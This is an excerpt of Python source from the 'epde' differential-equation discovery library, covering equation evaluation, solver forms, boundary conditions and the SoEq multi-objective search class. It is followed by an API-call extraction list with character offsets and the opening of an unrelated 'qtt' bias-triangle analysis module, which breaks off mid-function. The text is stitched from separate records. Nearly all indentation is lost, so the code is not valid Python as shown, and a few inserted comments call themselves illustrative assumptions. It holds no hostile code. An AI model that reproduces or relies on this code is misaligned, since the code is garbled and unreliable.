for passed_term in basic_structure:
if isinstance(passed_term, Term):
self.structure.append(passed_term)
elif isinstance(passed_term, str):
self.structure.append(Term(self.pool, passed_term = passed_term,
max_factors_in_term = self.max_factors_in_term))
for i in range(len(basic_structure), terms_number):
check_test = 0
while True:
check_test += 1
new_term = Term(self.pool, max_factors_in_term = self.max_factors_in_term, passed_term = None)
if Check_Unqueness(new_term, self.structure):
break
self.structure.append(new_term)
for idx, _ in enumerate(self.structure):
self.structure[idx].use_cache()
@property
def contains_deriv(self):
return any([term.contains_deriv for term in self.structure])
@property
def forbidden_token_labels(self):
target_symbolic = [factor.label for factor in self.structure[self.target_idx].structure]
forbidden_tokens = set()
for token_family in self.pool.families:
for token in token_family.tokens:
if token in target_symbolic and token_family.status['unique_for_right_part']:
forbidden_tokens.add(token)
return forbidden_tokens
def reconstruct_to_contain_deriv(self):
while True:
replacement_idx = np.random.randint(low = 0, high = len(self.structure))
temp = Term(self.pool, max_factors_in_term=self.max_factors_in_term) # , forbidden_tokens=self.forbidden_token_labels
if temp.contains_deriv:
self.structure[replacement_idx] = temp
break
def reconstruct_by_right_part(self, right_part_idx):
new_eq = copy.deepcopy(self)
self.copy_properties_to(new_eq)
new_eq.target_idx = right_part_idx
if any([factor.status['unique_for_right_part'] for factor in new_eq.structure[right_part_idx].structure]):
for term_idx, term in enumerate(new_eq.structure):
if term_idx != right_part_idx:
term.Filter_tokens_by_right_part(new_eq.structure[right_part_idx], self, term_idx)
new_eq.reset_saved_state()
return new_eq
def evaluate(self, normalize = True, return_val = False, save = True):
self._target = self.structure[self.target_idx].evaluate(normalize)
feature_indexes = list(range(len(self.structure)))
feature_indexes.remove(self.target_idx)
for feat_idx in range(len(feature_indexes)):
if feat_idx == 0:
self._features = self.structure[feature_indexes[feat_idx]].evaluate(normalize)
elif feat_idx != 0:
temp = self.structure[feature_indexes[feat_idx]].evaluate(normalize)
self._features = np.vstack([self._features, temp])
else:
continue
if self._features.ndim == 1:
self._features = np.expand_dims(self._features, 1)
temp_feats = np.vstack([self._features, np.ones(self._features.shape[1])])
self._features = np.transpose(self._features); temp_feats = np.transpose(temp_feats)
if return_val:
self.prev_normalized = normalize
if normalize:
elem1 = np.expand_dims(self._target, axis = 1)
value = np.add(elem1, - reduce(lambda x,y: np.add(x, y), [np.multiply(weight, temp_feats[:,feature_idx])
for feature_idx, weight in np.ndenumerate(self.weights_internal)]))
else:
elem1 = np.expand_dims(self._target, axis = 1)
value = np.add(elem1, - reduce(lambda x,y: np.add(x, y), [np.multiply(weight, temp_feats[:,feature_idx])
for feature_idx, weight in np.ndenumerate(self.weights_final)]))
return value, self._target, self._features
else:
return None, self._target, self._features
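    # evaluate() assembles the regression problem for this equation: the term at
    # target_idx becomes the target vector, the remaining terms plus a column of ones
    # (free coefficient) form the feature matrix, and when return_val is True the
    # residual target - features * weights is computed with the internal weights for
    # normalized data or the final weights otherwise.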
def reset_state(self, reset_right_part : bool = True):
if reset_right_part: self.right_part_selected = False
self.weights_internal_evald = False
self.weights_final_evald = False
self.fitness_calculated = False
self.solver_form_defined = False
@Reset_equation_status(reset_input = False, reset_output = True)
@History_Extender('\n -> was copied by deepcopy(self)', 'n')
def __deepcopy__(self, memo = None):
clss = self.__class__
new_struct = clss.__new__(clss)
memo[id(self)] = new_struct
attrs_to_avoid_copy = ['_features', '_target']
# print(self.__slots__)
for k in self.__slots__:
try:
# print('successful writing', k, getattr(self, k))
if k not in attrs_to_avoid_copy:
setattr(new_struct, k, copy.deepcopy(getattr(self, k), memo))
else:
setattr(new_struct, k, None)
except AttributeError:
# print('unsuccessful writing', k)
pass
# new_struct.__dict__.update(self.__dict__)
# new_struct.structure = copy.deepcopy(self.structure)
return new_struct
def copy_properties_to(self, new_equation):
new_equation.weights_internal_evald = self.weights_internal_evald
new_equation.weights_final_evald = self.weights_final_evald
new_equation.right_part_selected = self.right_part_selected
new_equation.fitness_calculated = self.fitness_calculated
new_equation.solver_form_defined = self.solver_form_defined
try:
new_equation._fitness_value = self._fitness_value
except AttributeError:
pass
def add_history(self, add):
self._history += add
@property
def history(self):
return self._history
@property
def fitness_value(self):
return self._fitness_value
@fitness_value.setter
def fitness_value(self, val):
self._fitness_value = val
def penalize_fitness(self, coeff = 1.):
self._fitness_value = self._fitness_value*coeff
@property
def weights_internal(self):
if self.weights_internal_evald:
return self._weights_internal
else:
raise AttributeError('Internal weights called before initialization')
@weights_internal.setter
def weights_internal(self, weights):
self._weights_internal = weights
self.weights_internal_evald = True
self.weights_final_evald = False
@property
def weights_final(self):
if self.weights_final_evald:
return self._weights_final
else:
raise AttributeError('Final weights called before initialization')
@weights_final.setter
def weights_final(self, weights):
self._weights_final = weights
self.weights_final_evald = True
@property
def latex_form(self):
form = r""
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
form += str(self.weights_final[term_idx]) if term_idx < self.target_idx else str(self.weights_final[term_idx-1])
form += ' * ' + self.structure[term_idx].latex_form + ' + '
form += str(self.weights_final[-1]) + ' = ' + self.structure[self.target_idx].text_form
return form
@property
def text_form(self):
form = ''
if self.weights_final_evald:
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
form += str(self.weights_final[term_idx]) if term_idx < self.target_idx else str(self.weights_final[term_idx-1])
form += ' * ' + self.structure[term_idx].name + ' + '
form += str(self.weights_final[-1]) + ' = ' + self.structure[self.target_idx].name
else:
for term_idx in range(len(self.structure)):
form += 'k_'+ str(term_idx) + ' ' + self.structure[term_idx].name + ' + '
form += 'k_' + str(len(self.structure)) + ' = 0'
return form
def solver_form(self):
if self.solver_form_defined:
return self._solver_form
else:
self._solver_form = []
for term_idx in range(len(self.structure)):
if term_idx != self.target_idx:
term_form = self.structure[term_idx].solver_form
weight = self.weights_final[term_idx] if term_idx < self.target_idx else self.weights_final[term_idx-1]
term_form[0] = term_form[0] * weight
term_form[0] = torch.flatten(term_form[0]).unsqueeze(1).type(torch.FloatTensor)
self._solver_form.append(term_form)
free_coeff_weight = torch.from_numpy(np.full_like(a = global_var.grid_cache.get('0'),
fill_value = self.weights_final[-1]))
free_coeff_weight = torch.flatten(free_coeff_weight).unsqueeze(1).type(torch.FloatTensor)
target_weight = torch.from_numpy(np.full_like(a = global_var.grid_cache.get('0'),
fill_value = -1))
target_form = self.structure[self.target_idx].solver_form
target_form[0] = target_form[0] * target_weight
target_form[0] = torch.flatten(target_form[0]).unsqueeze(1).type(torch.FloatTensor)
self._solver_form.append([free_coeff_weight, [None,], 0])
self._solver_form.append(target_form)
self.solver_form_defined = True
return self._solver_form
@property
def state(self):
return self.text_form
@property
def described_variables(self):
eps=1e-7
described = set()
for term_idx, term in enumerate(self.structure):
if term_idx == self.target_idx:
described.update({factor.type for factor in term.structure})
else:
                weight_idx = term_idx if term_idx < self.target_idx else term_idx - 1
if np.abs(self.weights_final[weight_idx]) > eps:
described.update({factor.type for factor in term.structure})
described = frozenset(described)
return described
def max_deriv_orders(self):
solver_form = self.solver_form()
max_orders = np.zeros(global_var.grid_cache.get('0').ndim)
def count_order(obj, deriv_ax):
if obj is None:
return 0
else:
return obj.count(deriv_ax)
for term in solver_form:
if isinstance(term[2], list):
for deriv_factor in term[1]:
orders = np.array([count_order(deriv_factor, ax) for ax #deriv_factor.count(ax)
in np.arange(max_orders.size)])
max_orders = np.maximum(max_orders, orders)
else:
orders = np.array([count_order(term[1], ax) for ax # term[1].count(ax)
in np.arange(max_orders.size)])
max_orders = np.maximum(max_orders, orders)
if np.max(max_orders) > 2:
            raise NotImplementedError('The current implementation does not allow equation orders higher than 2.')
return max_orders
def boundary_conditions(self, main_var_key = ('u', (1.0,))):
        required_bc_ord = self.max_deriv_orders() # We assume that the maximum order of the equation is 2
if global_var.grid_cache is None:
raise NameError('Grid cache has not been initialized yet.')
bconds = []
hardcoded_bc_relative_locations = {0 : None, 1 : (0,), 2 : (0, 1)}
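        # Relative boundary locations per derivative order along an axis: order 0 needs
        # no boundary condition, order 1 needs one (at the lower edge, 0), and order 2
        # needs two (at both edges, 0 and 1).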
tensor_shape = global_var.grid_cache.get('0').shape
def get_boundary_ind(tensor_shape, axis, rel_loc):
return tuple(np.meshgrid(*[np.arange(shape) if dim_idx != axis else min(int(rel_loc * shape), shape-1)
for dim_idx, shape in enumerate(tensor_shape)], indexing = 'ij'))
for ax_idx, ax_ord in enumerate(required_bc_ord):
for loc_fraction in hardcoded_bc_relative_locations[ax_ord]:
indexes = get_boundary_ind(tensor_shape, axis = ax_idx, rel_loc = loc_fraction)
coords = np.squeeze(np.array([global_var.grid_cache.get(str(idx))[indexes] for idx in np.arange(len(tensor_shape))])).T
vals = np.squeeze(global_var.tensor_cache.get(main_var_key)[indexes]).T
coords = torch.from_numpy(coords).type(torch.FloatTensor)
vals = torch.from_numpy(vals).type(torch.FloatTensor)
bconds.append([coords, vals])
print('shape of the grid', global_var.grid_cache.get('0').shape)
print('Obtained boundary conditions', len(bconds[0]))
return bconds
def standalone_boundary_conditions(max_deriv_orders, main_var_key = ('u', (1.0,))):
    required_bc_ord = max_deriv_orders # We assume that the maximum order of the equation is 2
if global_var.grid_cache is None:
raise NameError('Grid cache has not been initialized yet.')
bconds = []
hardcoded_bc_relative_locations = {0 : None, 1 : (0,), 2 : (0, 1)}
tensor_shape = global_var.grid_cache.get('0').shape
def get_boundary_ind(tensor_shape, axis, rel_loc, old_way = False):
return tuple(np.meshgrid(*[np.arange(shape) if dim_idx != axis else min(int(rel_loc * shape), shape-1)
for dim_idx, shape in enumerate(tensor_shape)], indexing = 'ij'))
for ax_idx, ax_ord in enumerate(required_bc_ord):
for loc_fraction in hardcoded_bc_relative_locations[ax_ord]:
indexes = get_boundary_ind(tensor_shape, axis = ax_idx, rel_loc = loc_fraction)
coords = np.array([global_var.grid_cache.get(str(idx))[indexes] for idx in np.arange(len(tensor_shape))])
vals = global_var.tensor_cache.get(main_var_key)[indexes]
coords = torch.from_numpy(coords)
vals = torch.from_numpy(vals)
bconds.append([coords, vals])
return bconds
class SoEq(Complex_Structure, moeadd.moeadd_solution):
# __slots__ = ['tokens_indep', 'tokens_dep', 'equation_number']
def __init__(self, pool, terms_number, max_factors_in_term, sparcity = None, eq_search_iters = 100):
self.tokens_indep = TF_Pool(pool.families_meaningful) #[family for family in token_families if family.status['meaningful']]
self.tokens_dep = TF_Pool(pool.families_supplementary) #[family for family in token_families if not family.status['meaningful']]
self.equation_number = np.size(self.tokens_indep.families_cardinality())
        if sparcity is not None: self.vals = sparcity
self.max_terms_number = terms_number; self.max_factors_in_term = max_factors_in_term
self.moeadd_set = False; self.eq_search_operator_set = False# ; self.evaluated = False
self.def_eq_search_iters = eq_search_iters
def use_default_objective_function(self):
from epde.eq_mo_objectives import system_discrepancy, system_complexity_by_terms
self.set_objective_functions([system_discrepancy, system_complexity_by_terms])
def set_objective_functions(self, obj_funs):
'''
Method to set the objective functions to evaluate the "quality" of the system of equations.
Parameters:
-----------
obj_funs - callable or list of callables;
function/functions to evaluate quality metrics of system of equations. Can return a single
metric (for example, quality of the process modelling with specific system), or
a list of metrics (for example, number of terms for each equation in the system).
The function results will be flattened after their application.
'''
assert callable(obj_funs) or all([callable(fun) for fun in obj_funs])
self.obj_funs = obj_funs
# import time
# print(len(self.obj_funs))
# time.sleep(10)
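        # Illustrative usage (an assumption, not from the original source; `system` is a
        # hypothetical SoEq instance), mirroring use_default_objective_function() above:
        #   system.set_objective_functions([system_discrepancy, system_complexity_by_terms])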
def set_eq_search_evolutionary(self, evolutionary):
        # raise NotImplementedError('In current version, the evolutionary operator shall be taken from global variables')
# assert type(evolutionary.coeff_calculator) != type(None), 'Defined evolutionary operator lacks coefficient calculator'
self.eq_search_evolutionary_strategy = evolutionary
self.eq_search_operator_set = True
def create_equations(self, population_size = 16, sparcity = None, eq_search_iters = None, EA_kwargs = dict()):
# if type(eq_search_iters) == type(None) and type(self.def_eq_search_iters) == type(None):
        # raise ValueError('Number of iterations is not defined either in the method parameter or in the object attribute')
assert self.eq_search_operator_set
        if eq_search_iters is None: eq_search_iters = self.def_eq_search_iters
        if sparcity is None:
sparcity = self.vals
else:
self.vals = sparcity
self.population_size = population_size
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'truncation',
param_label = 'population_size',
value = population_size)
self.structure = []; self.eq_search_iters = eq_search_iters
token_selection = self.tokens_indep
self.vars_to_describe = {token_family.type for token_family in self.tokens_dep.families}
self.vars_to_describe = self.vars_to_describe.union({token_family.type for token_family in self.tokens_indep.families})
self.separated_vars = set()
for eq_idx in range(self.equation_number):
current_tokens = token_selection + self.tokens_dep
# print('Equation index', eq_idx, self.vals)
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'rps1', param_label = 'sparsity',
value = self.vals[eq_idx], suboperator_sequence = ['eq_level_rps', 'fitness_calculation', 'sparsity'])#(sparcity_value = self.vals[eq_idx])
self.eq_search_evolutionary_strategy.modify_block_params(block_label = 'rps2', param_label = 'sparsity',
value = self.vals[eq_idx], suboperator_sequence = ['eq_level_rps', 'fitness_calculation', 'sparsity'])#(sparcity_value = self.vals[eq_idx])
cur_equation, cur_eq_operator_error_abs, cur_eq_operator_error_structural = self.optimize_equation(pool = current_tokens,
strategy = self.eq_search_evolutionary_strategy, population_size = self.population_size,
separate_vars = self.separated_vars, EA_kwargs = EA_kwargs)
self.vars_to_describe.difference_update(cur_equation.described_variables)
self.separated_vars.add(frozenset(cur_equation.described_variables))
self.structure.append(cur_equation)
# self.single_vars_in_equation.update()
# cache.clear(full = False)
if not eq_idx == self.equation_number - 1:
global_var.tensor_cache.change_variables(cur_eq_operator_error_abs,
cur_eq_operator_error_structural)
# for idx, _ in enumerate(token_selection):
# token_selection[idx].change_variables(cur_eq_operator_error)
# obj_funs = np.array(flatten([func(self) for func in self.obj_funs]))
# np.array([self.evaluate(normalize = False),] + [eq.L0_norm for eq in self.structure])
moeadd.moeadd_solution.__init__(self, self.vals, self.obj_funs) # , return_val = True, self) super(
self.moeadd_set = True
def optimize_equation(self, pool, strategy, population_size, basic_terms : list = [],
separate_vars : set = None, EA_kwargs = dict()):
population = [Equation(pool, basic_terms, self.max_terms_number, self.max_factors_in_term)
for i in range(population_size)]
EA_kwargs['separate_vars'] = separate_vars
strategy.run(initial_population = population, EA_kwargs = EA_kwargs)
result = strategy.result
return result[0], result[0].evaluate(normalize = False, return_val=True)[0], result[0].evaluate(normalize = True, return_val=True)[0]
@staticmethod
def equation_opt_iteration(population, evol_operator, population_size, iter_index, separate_vars, strict_restrictions = True):
for equation in population:
if equation.described_variables in separate_vars:
equation.penalize_fitness(coeff = 0.)
population = Population_Sort(population)
population = population[:population_size]
gc.collect()
population = evol_operator.apply(population, separate_vars)
return population
def evaluate(self, normalize = True):
if len(self.structure) == 1:
value = self.structure[0].evaluate(normalize = normalize, return_val = True)[0]
else:
value = np.sum([equation.evaluate(normalize, return_val = True)[0] for equation in self.structure])
value = np.sum(np.abs(value))
return value
@property
def obj_fun(self):
# print('objective functions:', self.obj_funs)
# print('objective function values:', [func(self) for func in self.obj_funs], flatten([func(self) for func in self.obj_funs]))
return np.array(flatten([func(self) for func in self.obj_funs]))
def __call__(self):
assert self.moeadd_set, 'The structure of the equation is not defined, therefore no moeadd operations can be called'
return self.obj_fun
@property
def text_form(self):
form = ''
if len(self.structure) > 1:
for eq_idx, equation in enumerate(self.structure):
if eq_idx == 0:
form += '/ ' + equation.text_form + '\n'
elif eq_idx == len(self.structure) - 1:
form += '\ ' + equation.text_form + '\n'
else:
form += '| ' + equation.text_form + '\n'
else:
form += self.structure[0].text_form + '\n'
return form
def __eq__(self, other):
assert self.moeadd_set, 'The structure of the equation is not defined, therefore no moeadd operations can be called'
# eps = 1e-9
return (all([any([other_elem == self_elem for other_elem in other.structure]) for self_elem in self.structure]) and
all([any([other_elem == self_elem for self_elem in self.structure]) for other_elem in other.structure]) and
len(other.structure) == len(self.structure)) or all(np.isclose(self.obj_fun, other.obj_fun))
@property
def latex_form(self):
form = r"\begin{eqnarray*}"
for equation in self.structure:
form += equation.latex_form + r", \\ "
        form += r"\end{eqnarray*}"
        return form
def __hash__(self):
return hash(tuple(self.vals))
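# Illustrative call sequence (an assumption based on the methods above; `pool` and
# `strategy` stand for pre-built epde token-pool and evolutionary-strategy objects):
#   system = SoEq(pool, terms_number=6, max_factors_in_term=2, sparcity=(1e-6,))
#   system.use_default_objective_function()
#   system.set_eq_search_evolutionary(strategy)
#   system.create_equations(population_size=16)
#   print(system.text_form)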
|
[
"epde.interface.token_family.TF_Pool",
"numpy.abs",
"numpy.maximum",
"epde.supplementary.Population_Sort",
"numpy.ones",
"gc.collect",
"numpy.isclose",
"numpy.random.randint",
"numpy.arange",
"numpy.mean",
"torch.flatten",
"numpy.multiply",
"numpy.copy",
"numpy.std",
"numpy.ndim",
"numpy.transpose",
"epde.globals.tensor_cache.add",
"numpy.max",
"numpy.add",
"epde.moeadd.moeadd_stc.moeadd_solution.__init__",
"epde.globals.tensor_cache.get",
"copy.deepcopy",
"numpy.ndenumerate",
"epde.globals.tensor_cache.change_variables",
"epde.supplementary.Filter_powers",
"epde.globals.grid_cache.get",
"numpy.vstack",
"torch.from_numpy",
"epde.decorators.History_Extender",
"numpy.expand_dims",
"epde.decorators.Reset_equation_status",
"warnings.warn"
] |
[((728, 742), 'numpy.copy', 'np.copy', (['Input'], {}), '(Input)\n', (735, 742), True, 'import numpy as np\n'), ((21638, 21697), 'epde.decorators.Reset_equation_status', 'Reset_equation_status', ([], {'reset_input': '(False)', 'reset_output': '(True)'}), '(reset_input=False, reset_output=True)\n', (21659, 21697), False, 'from epde.decorators import History_Extender, Reset_equation_status\n'), ((21707, 21769), 'epde.decorators.History_Extender', 'History_Extender', (['"""\n -> was copied by deepcopy(self)"""', '"""n"""'], {}), '("""\n -> was copied by deepcopy(self)""", \'n\')\n', (21723, 21769), False, 'from epde.decorators import History_Extender, Reset_equation_status\n'), ((775, 790), 'numpy.ndim', 'np.ndim', (['matrix'], {}), '(matrix)\n', (782, 790), True, 'import numpy as np\n'), ((5841, 5891), 'numpy.random.randint', 'np.random.randint', (['(1)', '(self.max_factors_in_term + 1)'], {}), '(1, self.max_factors_in_term + 1)\n', (5858, 5891), True, 'import numpy as np\n'), ((13770, 13800), 'torch.from_numpy', 'torch.from_numpy', (['coeff_tensor'], {}), '(coeff_tensor)\n', (13786, 13800), False, 'import torch\n'), ((19061, 19080), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (19074, 19080), False, 'import copy\n'), ((20421, 20449), 'numpy.transpose', 'np.transpose', (['self._features'], {}), '(self._features)\n', (20433, 20449), True, 'import numpy as np\n'), ((20464, 20488), 'numpy.transpose', 'np.transpose', (['temp_feats'], {}), '(temp_feats)\n', (20476, 20488), True, 'import numpy as np\n'), ((30989, 31019), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (31014, 31019), True, 'import epde.globals as global_var\n'), ((32146, 32179), 'epde.interface.token_family.TF_Pool', 'TF_Pool', (['pool.families_meaningful'], {}), '(pool.families_meaningful)\n', (32153, 32179), False, 'from epde.interface.token_family import TF_Pool\n'), ((32276, 32312), 'epde.interface.token_family.TF_Pool', 'TF_Pool', (['pool.families_supplementary'], {}), '(pool.families_supplementary)\n', (32283, 32312), False, 'from epde.interface.token_family import TF_Pool\n'), ((37692, 37755), 'epde.moeadd.moeadd_stc.moeadd_solution.__init__', 'moeadd.moeadd_solution.__init__', (['self', 'self.vals', 'self.obj_funs'], {}), '(self, self.vals, self.obj_funs)\n', (37723, 37755), True, 'import epde.moeadd.moeadd_stc as moeadd\n'), ((38813, 38840), 'epde.supplementary.Population_Sort', 'Population_Sort', (['population'], {}), '(population)\n', (38828, 38840), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((38899, 38911), 'gc.collect', 'gc.collect', ([], {}), '()\n', (38909, 38911), False, 'import gc\n'), ((897, 912), 'numpy.ndim', 'np.ndim', (['matrix'], {}), '(matrix)\n', (904, 912), True, 'import numpy as np\n'), ((968, 994), 'numpy.arange', 'np.arange', (['matrix.shape[0]'], {}), '(matrix.shape[0])\n', (977, 994), True, 'import numpy as np\n'), ((6352, 6377), 'numpy.arange', 'np.arange', (['(1)', 'factors_num'], {}), '(1, factors_num)\n', (6361, 6377), True, 'import numpy as np\n'), ((7515, 7544), 'epde.supplementary.Filter_powers', 'Filter_powers', (['self.structure'], {}), '(self.structure)\n', (7528, 7544), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((8094, 8200), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['self.cache_label'], {'normalized': 'normalize', 'saved_as': 'self.saved_as[normalize]'}), '(self.cache_label, normalized=normalize,\n 
saved_as=self.saved_as[normalize])\n', (8121, 8200), True, 'import epde.globals as global_var\n'), ((9725, 9744), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (9738, 9744), False, 'import copy\n'), ((20279, 20312), 'numpy.expand_dims', 'np.expand_dims', (['self._features', '(1)'], {}), '(self._features, 1)\n', (20293, 20312), True, 'import numpy as np\n'), ((28856, 28874), 'numpy.max', 'np.max', (['max_orders'], {}), '(max_orders)\n', (28862, 28874), True, 'import numpy as np\n'), ((29456, 29486), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (29481, 29486), True, 'import epde.globals as global_var\n'), ((31737, 31761), 'torch.from_numpy', 'torch.from_numpy', (['coords'], {}), '(coords)\n', (31753, 31761), False, 'import torch\n'), ((31781, 31803), 'torch.from_numpy', 'torch.from_numpy', (['vals'], {}), '(vals)\n', (31797, 31803), False, 'import torch\n'), ((39335, 39348), 'numpy.abs', 'np.abs', (['value'], {}), '(value)\n', (39341, 39348), True, 'import numpy as np\n'), ((1051, 1068), 'numpy.std', 'np.std', (['matrix[i]'], {}), '(matrix[i])\n', (1057, 1068), True, 'import numpy as np\n'), ((8911, 8985), 'epde.globals.tensor_cache.add', 'global_var.tensor_cache.add', (['self.cache_label', 'value'], {'normalized': 'normalize'}), '(self.cache_label, value, normalized=normalize)\n', (8938, 8985), True, 'import epde.globals as global_var\n'), ((10578, 10607), 'epde.supplementary.Filter_powers', 'Filter_powers', (['self.structure'], {}), '(self.structure)\n', (10591, 10607), False, 'from epde.supplementary import Filter_powers, Population_Sort, flatten\n'), ((10725, 10841), 'warnings.warn', 'warnings.warn', (['"""Can not create unique term, while filtering equation tokens in regards to the right part."""'], {}), "(\n 'Can not create unique term, while filtering equation tokens in regards to the right part.'\n )\n", (10738, 10841), False, 'import warnings\n'), ((12074, 12094), 'copy.deepcopy', 'copy.deepcopy', (['token'], {}), '(token)\n', (12087, 12094), False, 'import copy\n'), ((12990, 13020), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (13015, 13020), True, 'import epde.globals as global_var\n'), ((20361, 20393), 'numpy.ones', 'np.ones', (['self._features.shape[1]'], {}), '(self._features.shape[1])\n', (20368, 20393), True, 'import numpy as np\n'), ((20607, 20643), 'numpy.expand_dims', 'np.expand_dims', (['self._target'], {'axis': '(1)'}), '(self._target, axis=1)\n', (20621, 20643), True, 'import numpy as np\n'), ((20930, 20966), 'numpy.expand_dims', 'np.expand_dims', (['self._target'], {'axis': '(1)'}), '(self._target, axis=1)\n', (20944, 20966), True, 'import numpy as np\n'), ((28041, 28071), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (28066, 28071), True, 'import epde.globals as global_var\n'), ((28814, 28844), 'numpy.maximum', 'np.maximum', (['max_orders', 'orders'], {}), '(max_orders, orders)\n', (28824, 28844), True, 'import numpy as np\n'), ((30457, 30487), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (30482, 30487), True, 'import epde.globals as global_var\n'), ((31652, 31693), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['main_var_key'], {}), '(main_var_key)\n', (31679, 31693), True, 'import epde.globals as global_var\n'), ((37193, 37298), 'epde.globals.tensor_cache.change_variables', 'global_var.tensor_cache.change_variables', (['cur_eq_operator_error_abs', 
'cur_eq_operator_error_structural'], {}), '(cur_eq_operator_error_abs,\n cur_eq_operator_error_structural)\n', (37233, 37298), True, 'import epde.globals as global_var\n'), ((40936, 40975), 'numpy.isclose', 'np.isclose', (['self.obj_fun', 'other.obj_fun'], {}), '(self.obj_fun, other.obj_fun)\n', (40946, 40975), True, 'import numpy as np\n'), ((8458, 8472), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8465, 8472), True, 'import numpy as np\n'), ((20136, 20169), 'numpy.vstack', 'np.vstack', (['[self._features, temp]'], {}), '([self._features, temp])\n', (20145, 20169), True, 'import numpy as np\n'), ((27740, 27778), 'numpy.abs', 'np.abs', (['self.weights_final[weight_idx]'], {}), '(self.weights_final[weight_idx])\n', (27746, 27778), True, 'import numpy as np\n'), ((28582, 28612), 'numpy.maximum', 'np.maximum', (['max_orders', 'orders'], {}), '(max_orders, orders)\n', (28592, 28612), True, 'import numpy as np\n'), ((8558, 8572), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8565, 8572), True, 'import numpy as np\n'), ((8582, 8595), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8588, 8595), True, 'import numpy as np\n'), ((8651, 8664), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8657, 8664), True, 'import numpy as np\n'), ((26401, 26431), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (26426, 26431), True, 'import epde.globals as global_var\n'), ((26698, 26728), 'epde.globals.grid_cache.get', 'global_var.grid_cache.get', (['"""0"""'], {}), "('0')\n", (26723, 26728), True, 'import epde.globals as global_var\n'), ((30252, 30276), 'torch.from_numpy', 'torch.from_numpy', (['coords'], {}), '(coords)\n', (30268, 30276), False, 'import torch\n'), ((30324, 30346), 'torch.from_numpy', 'torch.from_numpy', (['vals'], {}), '(vals)\n', (30340, 30346), False, 'import torch\n'), ((1135, 1153), 'numpy.mean', 'np.mean', (['matrix[i]'], {}), '(matrix[i])\n', (1142, 1153), True, 'import numpy as np\n'), ((8635, 8649), 'numpy.mean', 'np.mean', (['value'], {}), '(value)\n', (8642, 8649), True, 'import numpy as np\n'), ((8696, 8710), 'numpy.ndim', 'np.ndim', (['value'], {}), '(value)\n', (8703, 8710), True, 'import numpy as np\n'), ((8720, 8733), 'numpy.std', 'np.std', (['value'], {}), '(value)\n', (8726, 8733), True, 'import numpy as np\n'), ((8773, 8787), 'numpy.mean', 'np.mean', (['value'], {}), '(value)\n', (8780, 8787), True, 'import numpy as np\n'), ((26566, 26598), 'torch.flatten', 'torch.flatten', (['free_coeff_weight'], {}), '(free_coeff_weight)\n', (26579, 26598), False, 'import torch\n'), ((26982, 27011), 'torch.flatten', 'torch.flatten', (['target_form[0]'], {}), '(target_form[0])\n', (26995, 27011), False, 'import torch\n'), ((28756, 28782), 'numpy.arange', 'np.arange', (['max_orders.size'], {}), '(max_orders.size)\n', (28765, 28782), True, 'import numpy as np\n'), ((30156, 30197), 'epde.globals.tensor_cache.get', 'global_var.tensor_cache.get', (['main_var_key'], {}), '(main_var_key)\n', (30183, 30197), True, 'import epde.globals as global_var\n'), ((31134, 31150), 'numpy.arange', 'np.arange', (['shape'], {}), '(shape)\n', (31143, 31150), True, 'import numpy as np\n'), ((20705, 20717), 'numpy.add', 'np.add', (['x', 'y'], {}), '(x, y)\n', (20711, 20717), True, 'import numpy as np\n'), ((20720, 20767), 'numpy.multiply', 'np.multiply', (['weight', 'temp_feats[:, feature_idx]'], {}), '(weight, temp_feats[:, feature_idx])\n', (20731, 20767), True, 'import numpy as np\n'), ((21029, 21041), 'numpy.add', 'np.add', (['x', 'y'], 
{}), '(x, y)\n', (21035, 21041), True, 'import numpy as np\n'), ((21044, 21091), 'numpy.multiply', 'np.multiply', (['weight', 'temp_feats[:, feature_idx]'], {}), '(weight, temp_feats[:, feature_idx])\n', (21055, 21091), True, 'import numpy as np\n'), ((28520, 28546), 'numpy.arange', 'np.arange', (['max_orders.size'], {}), '(max_orders.size)\n', (28529, 28546), True, 'import numpy as np\n'), ((29592, 29608), 'numpy.arange', 'np.arange', (['shape'], {}), '(shape)\n', (29601, 29608), True, 'import numpy as np\n'), ((20846, 20883), 'numpy.ndenumerate', 'np.ndenumerate', (['self.weights_internal'], {}), '(self.weights_internal)\n', (20860, 20883), True, 'import numpy as np\n'), ((21170, 21204), 'numpy.ndenumerate', 'np.ndenumerate', (['self.weights_final'], {}), '(self.weights_final)\n', (21184, 21204), True, 'import numpy as np\n'), ((26193, 26220), 'torch.flatten', 'torch.flatten', (['term_form[0]'], {}), '(term_form[0])\n', (26206, 26220), False, 'import torch\n')]
|
""" Functionality to analyse bias triangles
@author: amjzwerver
"""
#%%
import numpy as np
import qcodes
import qtt
import qtt.pgeometry
import matplotlib.pyplot as plt
from qcodes.plots.qcmatplotlib import MatPlot
from qtt.data import diffDataset
def plotAnalysedLines(clicked_pts, linePoints1_2, linePt3_vert, linePt3_horz, linePt3_ints, intersect_point):
""" Plots lines based on three points clicked
Args:
        clicked_pts (array): the three clicked points (2 x 3 array of x, y coordinates)
linePoints1_2 (array): line fitted through points 1 and 2
linePt3_vert (array): vertical line through point 3
linePt3_horz (array): horizontal line through point 3
linePt3_ints (array): line through point 3 and its vert/horz intersection
with the line through point 1,2
        intersect_point (array): intersection of the line through point 3 with the line through points 1 and 2
"""
qtt.pgeometry.plot2Dline(linePoints1_2, ':c', alpha = .5)
qtt.pgeometry.plot2Dline(linePt3_vert, ':b', alpha=.4)
